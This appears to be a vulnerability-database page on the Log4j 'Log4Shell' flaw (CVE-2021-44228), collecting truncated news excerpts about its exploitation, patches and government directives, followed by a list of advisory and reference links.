Apache Log4j is an open-source logging utility written in Java that is used all over the world in many sof...

Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack
Threatpost • Lisa Vaas • 10 Dec 2021

An excruciating, easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover — and it’s being exploited in the wild.
The flaw first turned up on sites that cater to users of the world’s favorite game, Minecraft, on Thursday. The sites reportedly warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messa...

New zero-day exploit for Log4j Java library is an enterprise nightmare
BleepingComputer • Sergiu Gatlan • 10 Dec 2021

Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to remote code execution attacks.
is developed by the Apache Foundation and is widely used by both enterprise apps and cloud services.
Thus, while home users might have moved on from Java, anything from enterprise software to cloud software such as Apple's iCloud and Steam is likely vuln...

Log4j RCE: Emergency patch issued to plug critical auth-free code execution hole in widely-used logging utility
The Register • Gareth Corfield • 10 Dec 2021

Get our weekly newsletter Prepare to have a very busy weekend of mitigating and patching

An unauthenticated remote code execution vulnerability in Apache's Log4j Java-based logging tool is being actively exploited, researchers have warned after it was used to execute code on Minecraft servers.
Infosec firm Randori summarised the vuln in a blog post, saying: "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation."
Crafted proof-of-concept ...

Minecraft rushes out patch for critical Log4j vulnerability
BleepingComputer • Sergiu Gatlan • 10 Dec 2021

Swedish video game developer Mojang Studios has released an emergency Minecraft security update to address a critical bug in the Apache Log4j Java logging library used by the game's Java Edition client and multiplayer servers.
The vulnerability is fixed with the release of 
, which is now rolling out to all customers.
"This release fixes a critical security issue for multiplayer servers, changes how the world fog works to make more of the world visible, and fixes a couple of ...

Five Eyes nations reveal 2021's fifteen most-exploited flaws
The Register • Jessica Lyons Hardcastle • 01 Jan 1970

Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Malicious cyber actors go after 2021's biggest misses, spend less time on the classics

Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021 , according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies.
It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years.
Of course...

All Log4j, logback bugs we know so far and why you MUST ditch 2.15
BleepingComputer • Ax Sharma • 01 Jan 1970

Everyone's heard of the critical log4j zero-day by now. Dubbed 'Log4Shell' and 'Logjam,' the vulnerability has set the internet on fire.
Thus far, the log4j vulnerability, tracked as CVE-2021-44228, has been abused by all kinds of threat actors from 
 to 
 and others to 
 on vulnerable systems.
Log4j usage is rampant among many software products and multiple 
have since surfaced. And, it now seems, 'logback' isn't all that immune either.
Below...

Amazon Web Services fixes container escape in Log4Shell hotfix
BleepingComputer • Bill Toulas • 01 Jan 1970

Amazon Web Services (AWS) has fixed four security issues in its hot patch from December that addressed the critical Log4Shell vulnerability (CVE-2021-44228) affecting cloud or on-premise environments running Java applications with a vulnerable version of the Log4j logging library or containers.
The hot patch packages from Amazon are not exclusive to AWS resources and allowed escaping a container in the environment and taking control of the host. The flaws could als...

FTC warns companies to secure consumer data from Log4J attacks
BleepingComputer • Sergiu Gatlan • 01 Jan 1970

The US Federal Trade Commission (FTC) has warned today that it will go after any US company that fails to protect its customers' data against ongoing Log4J attacks.
"The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future," the US government agency 
.
"The duty to take reasonable steps to mitigate known software vulnerabilit...

Lazarus hackers target VMware servers with Log4Shell exploits
BleepingComputer • Bill Toulas • 01 Jan 1970

The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers.
The vulnerability is tracked as CVE-2021-44228, aka 
, and impacts many products, including VMware Horizon.
The exploitation of vulnerable Horizon deployments
, but many admins are yet to apply the available security updates.
According to a report published by analyst...

State hackers use new PowerShell backdoor in Log4j attacks
BleepingComputer • Bill Toulas • 01 Jan 1970

Hackers believed to be part of the Iranian APT35 state-backed group (aka 'Charming Kitten' or 'Phosphorus') has been observed leveraging Log4Shell attacks to drop a new PowerShell backdoor.
The modular payload can handle C2 communications, perform system enumeration, and eventually receive, decrypt, and load additional modules.
Log4Shell is an exploit for CVE-2021-44228, a critical remote code execution vulnerability in Apache Log4j disclosed in December.
According to research...

Log4shell exploits now used mostly for DDoS botnets, cryptominers
BleepingComputer • Bill Toulas • 01 Jan 1970

The Log4Shell vulnerabilities in the widely used Log4j software are still leveraged by threat actors today to deploy various malware payloads, including recruiting devices into DDoS botnets and for planting cryptominers.
According to a report by Barracuda, the past couple of months were characterized by dips and spikes in the targeting of Log4Shell, but the volume of exploitation attempts has remained relatively constant.
After analyzing these attacks, Barracuda determined that ...

Triton malware still a threat to energy sector, FBI warns
The Register • Jessica Lyons Hardcastle • 01 Jan 1970

Get our weekly newsletter Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad

In Brief Triton malware remains a threat to the global energy sector, according to an FBI warning.
Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility.
The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and ...

CISA orders federal agencies to patch Log4Shell by December 24th
BleepingComputer • Sergiu Gatlan • 01 Jan 1970

The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch systems against the critical Log4Shell vulnerability and released mitigation guidance in response to active exploitation.
This follows threat actors' head start in scanning for and
to deploy malware.
Even though Apache quickly released a patch to address the maximum severity remote code execution flaw (CVE-2021-44228)
, it only happened after attackers began deploying the ...

CISA releases Apache Log4j scanner to find vulnerable apps
BleepingComputer • Sergiu Gatlan • 01 Jan 1970

The Cybersecurity and Infrastructure Security Agency (CISA) has
the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.
"log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities," the cybersecurity agency

Hackers target Russian govt with fake Windows updates pushing RATs
BleepingComputer • Bill Toulas • 01 Jan 1970

Hackers are targeting Russian government agencies with phishing emails that pretend to be Windows security updates and other lures to install remote access malware.
The attacks are being conducted by a previously undetected APT (advanced persistent threat) group believed to be operating from China, who are linked to four separate spear-phishing campaigns.
These operations spanned between February and April 2022, coinciding with the Russian invasion of Ukraine. Its targets have been g...

US orders federal govt agencies to patch critical Log4j bug
BleepingComputer • Sergiu Gatlan • 01 Jan 1970

US Federal Civilian Executive Branch agencies have been ordered to patch the critical and actively exploited Log4Shell security vulnerability in the Apache Log4j library within the next six days.
The order comes through an emergency directive issued by the Cybersecurity and Infrastructure Security Agency (CISA) today.
This is not surprising given the risk the ongoing exploitation of this vulnerability poses and seeing that the security flaw (tracked as CVE-2021-44228) has also 

US emergency directive orders govt agencies to patch Log4j bug
BleepingComputer • Sergiu Gatlan • 01 Jan 1970

US Federal Civilian Executive Branch agencies have been ordered to patch the critical and actively exploited Log4Shell security vulnerability in the Apache Log4j library within the next six days.
The order comes through an emergency directive issued by the Cybersecurity and Infrastructure Security Agency (CISA) today.
This is not surprising given the risk the ongoing exploitation of this vulnerability poses and seeing that the security flaw (tracked as CVE-2021-44228) has also 

VMware Horizon platform pummeled by Log4j-fueled attacks
The Register • Jeff Burt • 01 Jan 1970

Get our weekly newsletter Miscreants deployed cryptominers, backdoors since late December, Sophos says

VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware.
In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos re...

References

CWE-502https://logging.apache.org/log4j/2.x/security.htmlhttp://www.openwall.com/lists/oss-security/2021/12/10/1http://www.openwall.com/lists/oss-security/2021/12/10/2http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttps://security.netapp.com/advisory/ntap-20211210-0007/https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttp://www.openwall.com/lists/oss-security/2021/12/10/3https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032https://www.oracle.com/security-alerts/alert-cve-2021-44228.htmlhttps://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/http://www.openwall.com/lists/oss-security/2021/12/13/1http://www.openwall.com/lists/oss-security/2021/12/13/2https://twitter.com/kurtseifried/status/1469345530182455296https://lists.debian.org/debian-lts-announce/2021/12/msg00007.htmlhttps://www.debian.org/security/2021/dsa-5020https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdfhttp://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.htmlhttp://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.htmlhttp://www.openwall.com/lists/oss-security/2021/12/14/4https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.htmlhttps://www.kb.cert.org/vuls/id/930724http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.htmlhttp://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.htmlhttp://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.htmlhttp://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.htmlhttp://www.openwall.com/lists/oss-security/2021/12/15/3https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdfhttps://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttps://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdfhttp://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.htmlhttps://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdfhttp://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.htmlhttps://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.mdhttp://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.htmlhttps://www.oracle.com/security-alerts/cpujan2022.htmlhttps://github.com/cisagov/log4j-affected-dbhttps://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001https://support.apple.com/kb/HT213189http://seclists.org/fulldisclosure/2022/Mar/23https://www.oracle.com/security-alerts/cpuapr2022.htmlhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228https://www.nu11secur1ty.com/2021/12/cve-2021-44228.htmlhttps://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1001478https://nvd.nist.govhttps://threatpost.com/ftc-pursue-companies-log4j/177368/https://www.cisa.gov/uscert/ics/advisories/icsa-21-357-02https://www.debian.org/security/2021/dsa-5020